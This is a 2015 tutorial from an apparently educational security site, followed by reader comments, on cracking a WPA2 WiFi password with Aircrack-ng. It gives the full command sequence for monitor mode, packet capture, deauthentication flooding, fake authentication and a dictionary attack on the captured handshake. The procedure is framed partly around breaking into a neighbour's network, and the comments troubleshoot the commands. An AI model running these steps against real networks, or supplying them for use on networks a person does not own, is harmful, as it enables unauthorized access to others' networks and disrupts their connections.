Cracking a WPA2 WiFi Password with Aircrack-ng

September 1, 2015 | Views: 163408

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hola amigos…

Aim: To crack a WPA2-psk encrypted WiFi password using Aircrack-ng.

Requirements:

  • If  you’re using a Kali Linux in VMware or other virtual machines, then you need to get a compatible USB WiFi receiver (I’m using an Atheros AR9271 wireless network adapter), because WiFi connections don’t show up in virtual machines. Instead, they show those connections as LAN and also in order to do packet injections (we’ll discuss about packet injections and their need in few minutes).
  • If you dual-booted your system and/or using Ubuntu or Mint Linux, then you’re good to go.

Wait…wait…

You also need a word list comprising of all the possible different combination of pass-phrases. You can can download some of them from Torrentz or click here.

You need the Aircrack-ng suite (in Kali Linux, it comes as a built-in tool). For others, you can get it by doing “sudo apt-get install aircrack-ng”

 

Moving ahead, assuming that you have met the above requirements…

 

Procedure:

Attach the USB WiFi receiver to the virtual machine (if you’re using one). Open up your terminal as root and type “ifconfig”. This will show you all the networking interfaces connected to your device.

Now, type “airmon-ng start wlan0 mon0”. This command will push your wireless interface into monitor mode. Here, ‘airmon-ng’ is a traffic monitoring tool, ‘wlan0’ is your wireless interface, ‘mon0’ is monitor mode and ‘start’ will start the monitor mode on the particular interface.

After entering this command, there pops up a list of process id’s that cause trouble during the process, so kill those processes by typing “kill <pid>”  In my case, “kill 3130 3227 4210 4236”. Now, type ifconfig and this will show the newly set monitoring interface i.e, mon0.

Next, type “airodump-ng mon0” (airodump-ng is a WiFi packets capturing tool) and this will start capturing all packets. From the captured packets, select your target and note its ‘bssid’ (bssid = base service set identifier) and channel. Stop the capture using “cntrl+c”.

Now, to start capturing the packets of your target network, type the following command “airodump-ng -c <channel> -w <name> -bssid <bssid> mon0” (-c = channel of your target, -w = writes the captutred data to a file, name = name assosiated to the file, -bssid = base service set id of your target, mon0 = interface on which capturing takes place).

In my case, “airodump-ng -c 11 -w wifi –bssid 10:FE:ED:2E:29:34 mon0”, which will start the capturing of packets.

While the capturing of packets goes on, open a new terminal as root and type “aireplay-ng -0 0 -a <bssid> mon0” (aireplay-ng = tool for deauthentication, fake authentication and other packet injections, -0 = number associated for deauthentication, 0 = deauth count, -a = bssid).

Here, we’re trying to send a deauthentication request. In my case, the command looks like “aireplay-ng -0 0 -a 10:FE:ED:2E:29:34 mon0”. After a few seconds, stop it using cntrl+c.

You can also do the fake authentication request by typing “aireplay-ng -1 0 -a 10:FE:ED:2E:29:34 -h 20:EF:FD:3F:36:45 wlan0” (-1 = fake authentication request number, 0 = count, -h = host bssid. The host bssid doesn’t really matter – some fake id would do the work).

If you look at the other terminal, we have successful captured the WPA handshake.

You can now stop the capturing using cntrl+c and type “ls”. This will bring up all the current directories and files. Select a file with “.cap”extension and type the following command “aircrack-ng -w <full location of the word list> <name of the file>” (aircrack-ng is a tool that helps in cracking the password). I

n my case, the command looks like “aircrack-ng -w /home/upendra/passwords.lst wifi-01.cap”  Now, it starts finding suitable passphrase.

Wait…wait and wait…(Password strength and cracking time are directly proportional.) Patience pays off …

In the end,

Key found.

 

“Yeah, everything works great but my neighbor uses his mobile number as a pass key and sometimes some random combination of specific words. How can I create a custom dictionary or word list of my own so that i could crack his password???”

Coming up, stay tuned …

Point to remember:  “With great power comes great responsibility.”

– Thank you –

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
54 Comments
  1. Which version of Kali Linux are you using? Because the commands “airodump-ng mon0” and “airmon-ng start wlan0 mon” do not work for me. Instead, I typed “airmon-ng start wlan0″ then airodump-ng wlan0”

    Also to kill the all the PIDs at the same time you can type this command: “airmon-ng check kill” and that will kill all the PIDs.

  2. Hi Upendra,

    Based on the process, the cracking of the password depends on the list of password used? So if the password is not in the list, it cannot break it. Thanks.

  3. what is pid????

  4. my first question is, can I hack wifi with laptop billetin wifi card? or i have to purchase the external wifi card if i m using kali linux 2.0 ( both if live or dual boot with windows).

    Second queestion is, when i typed the command “airmon-ng start wlan0 mon0″ i recieved this thing
    (”
    PHY Interface Driver Chipset

    phy0 wlan0mon b43 non-mac80211 device? (report this!)
    “)
    can i still hack the wifi ?
    please help @lalit

    • after writing command airodump-ng mon0 i got the answer
      “Interface mon0:
      ioctl(SIOCGIFINDEX) failed: No such device”

    • I am afraid you can’t. You need an external wifi adapter. Make sure it’s supported.
      Secondly your device may not be named just same shown in the tutorial. Mine’s was “airmon-ng start wlan0mon”.
      With right courage and determination you can. best of luck.

  5. Hey! Upendra
    brother I’m running live kali linux 2.0 via bootable USB is that okay to perfrom the hack?
    Do I need to install USB wifi recevier if yes then on this link {{ https://www.atheros.cz/atheros-wireless-download.php?chipset=64&system=6 }} which one should I go for?

Page 4 of 6« First...«23456»
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel